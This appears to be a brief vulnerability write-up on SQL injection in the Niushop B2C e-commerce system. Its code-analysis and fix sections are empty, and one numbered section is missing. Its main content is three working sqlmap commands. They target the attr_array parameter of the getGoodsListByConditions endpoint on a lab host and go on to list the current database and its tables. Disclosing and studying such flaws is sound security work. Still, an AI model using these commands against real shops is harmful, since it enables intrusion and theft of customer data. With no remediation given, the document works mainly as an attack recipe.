0x01 Preface

Niushop B2C is an e-commerce system built on ThinkPHP 5.0. Its source code is fully open (100%), it is free for commercial use, and it unifies four channels in one platform to meet the needs of users, enterprises, developers and service providers.

0x02 Code analysis

Trace into the ajaxGoodsList method in /Application/(wap/shop)/Controller/Goods.php.




0x04 Vulnerability reproduction

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql"

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" --current-db

sqlmap -u "http://172.16.209.129:8085/index.php/wap/goods/getGoodsListByConditions?category_id=1&brand_id=2&min_price=3&max_price=4&page=5&page_size=6&order=7&attr_array[][2]=8*&spec_array[]=9" --random-agent --batch --dbms "mysql" -D niushop_b2c --tables

0x05 Vulnerability fix

